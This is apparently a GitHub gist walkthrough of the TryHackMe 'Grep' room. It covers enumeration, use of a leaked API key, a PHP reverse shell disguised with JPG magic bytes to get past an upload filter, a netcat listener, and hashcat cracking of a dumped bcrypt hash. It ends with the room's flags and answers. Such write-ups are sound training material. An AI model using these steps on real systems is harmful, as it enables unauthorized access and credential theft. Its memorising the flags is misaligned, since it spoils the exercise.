Skip to content

Instantly share code, notes, and snippets.

@PythonCoderUnicorn

PythonCoderUnicorn/THM_grep.md

Created February 14, 2025 17:38
Show Gist options
  • Save PythonCoderUnicorn/d6b88a20a4dd6922377a44f4d68ccae6 to your computer and use it in GitHub Desktop.
Save PythonCoderUnicorn/d6b88a20a4dd6922377a44f4d68ccae6 to your computer and use it in GitHub Desktop.
Download ZIP
TryHackMe writeup for room Grep
Raw
THM_grep.md

THM Grep Walkthrough

Welcome to the OSINT challenge, part of TryHackMe’s Red Teaming Path. In this task, you will be an ethical hacker aiming to exploit a newly developed web application.

SuperSecure Corp, a fast-paced startup, is currently creating a blogging platform inviting security professionals to assess its security. The challenge involves using  OSINT techniques to gather information from publicly accessible sources and exploit potential vulnerabilities in the web application.

Your goal is to identify and exploit vulnerabilities in the application using a combination of recon and OSINT skills. As you progress, you’ll look for weak points in the app, find sensitive data, and attempt to gain unauthorized access. You will leverage the skills and knowledge acquired through the Red Team Pathway to devise and execute your attack strategies.

  • add the IP address to nano /etc/hosts/ as 10.10.x.x. grep.thm

nmap

22/tcp    open  ssh
80/tcp    open  http
|_http-title: Apache2 Ubuntu Default Page: It works
443/tcp   open  https
| ssl-cert: Subject: commonName=grep.thm/organizationName=SearchME/stateOrProvinceName=Some-State/countryName=US
| Not valid before: 2023-06-14T13:03:09
|_Not valid after:  2024-06-13T13:03:09
51337/tcp open  unknown
| ssl-cert: Subject: commonName=leakchecker.grep.thm/organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=AU
| Not valid before: 2023-06-14T12:58:31
|_Not valid after:  2024-06-13T12:58:31
| tls-alpn: 
|_  http/1.1
MAC Address: 02:6F:C7:43:91:87 (Unknown)

We see port 80 open, go to the webpage. we see Apache2 Ubuntu default page. Searched for CVEs for Apache2

(CVE-2021-34798)
(CVE-2021-33193)
(CVE-2021-36160)
(CVE-2021-39275)
(CVE-2021-40438)

but these are not useful to us.

checking port 51337

our nmap scan shows port 51337 is open. (this needs HTTPS)

  • https://grep.thm:51337/
  • need to add to /etc/hosts leakchecker.grep.thm
  • https://leakchecker.grep.thm:51337/

this website is email leak checker

(this step was later on in the process but moved here as it is a dead-end)

gobuster

we need to find what directories exist. Very important to add -k to the gobuster to deal with the certificates, otherwise gobuster will not work.

gobuster dir -u http://grep.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -t64 --no-error -k

this returns :

  • /phpmyadmin
  • /server-status
  • both need permissions

try agin with HTTPS https://grep.thm

websites has SearchMe! with a login and register

  • tried SQL injection = fails
  • enter dummy data and you get a "invalid or expired API key"

lets find directories

gobuster dir -u https://grep.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -t64 --no-error -k

returns:

  • /login.php
  • /register.php

Burp Suite

enter dummy data into the register form and capture it in Burp Suite then send to Repeater

Request -----------------------------------------
POST /api/register.php HTTP/1.1
Host: grep.thm
Cookie: PHPSESSID=v51597kkgp6v45ipkvl0n9gtj3
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://grep.thm/public/html/register.php
Content-Type: application/json
X-Thm-Api-Key: e8d25b4208b80008a9e15c8698640e85
Content-Length: 76
Origin: https://grep.thm
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connection: keep-alive

{"username":"test","password":"test","email":"[email protected]","name":"tester"}


Response -------------------------------------
{"error": "Invalid or Expired API key"}

we see a API key! But we need to search this website service, the room picture has GitHub logo, so we search there for SearchMe (same results for searchme) and we look for repositories with PHP

this repository has /api/

  • register.php
  • upload.php

check all of the files and check history logs

we see a commit history deletion of a API key ffe60ecaa8bba2f12b43d1a4b15b8f39 . Go back to Burp Suite Repeater and paste in this API key > send = ✅

our credentials
{"username":"test","password":"test","email":"[email protected]","name":"tester"}

login to SearchMe and see

First Flag THM{4ec9806d7e1350270dc402ba870ccebb}

gobuster

now that we have access to the website and got out 1st flag, we also see there is more to the url directory path /public/html/ so we find more directories

gobuster dir -u https://grep.thm/public/html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 --no-error -x php,hs,html -k

this returns

  • /admin.php
  • /upload.php
  • /dashboard.php (we were there for the flag)

In the GitHub repo history shows $uploadPath='api/uploads/' to checkout as well.

  • so we go to https://grep.thm/public/html/upload.php

PHP reverse shell

  • https://grep.thm/public/html/upload.php

The GitHub repo code shows that it checks for file types

$allowedExtensions = ['jpg', 'jpeg', 'png', 'bmp'];
$validMagicBytes = [
    'jpg' => 'ffd8ffe0', 
    'png' => '89504e47', 
    'bmp' => '424d'
];

we get a PHP reverse shell file, change the IP address to your (attacker IP and port). We also need to change the header of the file so it is read as a JPG instead of PHP.

  • have revshell.php file
  • at the top of the revshell.php file add dummy data that will be modified AAAAAAAA
  • run hexedit revshell.php

modify the file from (top row shown)

00000000   3C 3F 70 68  70 0A 2F 2F  20 70 68 70  2D 72 65 76  <?php.// php-rev

to

00000000 ff d8 ff e0 00 00 00

make sure you are just replacing the values up to <php so no AAAs are left just .....<php

  • now go to the /upload.php and upload the revshell.php file
  • should see "File uploaded successfully"
  • in your terminal start a netcat listener nc -nlvp 4445 or whatever port you used in the revshell.php file

navigate in another browser tab to https://grep.thm/api/uploads and click on the revshell.php file, check your terminal for reverse shell.

stabilize the shell

python3 -c 'import pty;pty.spawn("/bin/bash");'
export TERM=xterm
ctrl z
stty raw -echo; fg
stty rows 38 columns 116

navigate the system

ls 
tryhackme ubuntu
cd /var/www/
ls -la
cd leakchecker/
ls
cd ..
cd backup
ls
cat users.sql

INSERT INTO `users` (`id`, `username`, `password`, `email`, `name`, `role`) VALUES
(1, 'test', '$2y$10$dE6VAdZJCN4repNAFdsO2ePDr3StRdOhUJ1O/41XVQg91qBEBQU3G', '[email protected]', 'Test User', 'user'),
(2, 'admin', '$2y$10$3V62f66VxzdTzqXF4WHJI.Mpgcaj3WxwYsh7YDPyv1xIPss4qCT9C', '[email protected]', 'Admin User', 'admin');

You got all of the data you need

  • hashes.com hash identifier == Blowfish
  • $2y$10$3V62f66VxzdTzqXF4WHJI.Mpgcaj3WxwYsh7YDPyv1xIPss4qCT9C
  • hashcat -m 3200 -a0 -o cracked.txt hashfile.txt /usr/share/wordlists/rockyou.txt

the flags

What is the API key that allows a user to register on the website?
ffe60ecaa8bba2f12b43d1a4b15b8f39

What is the first flag?
THM{4ec9806d7e1350270dc402ba870ccebb}

What is the email of the "admin" user?
[email protected]

What is the host name of the web application that allows a user to check an email for a possible password leak?

leakchecker.grep.thm

What is the password of the "admin" user?

admin_tryhackme

reference

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment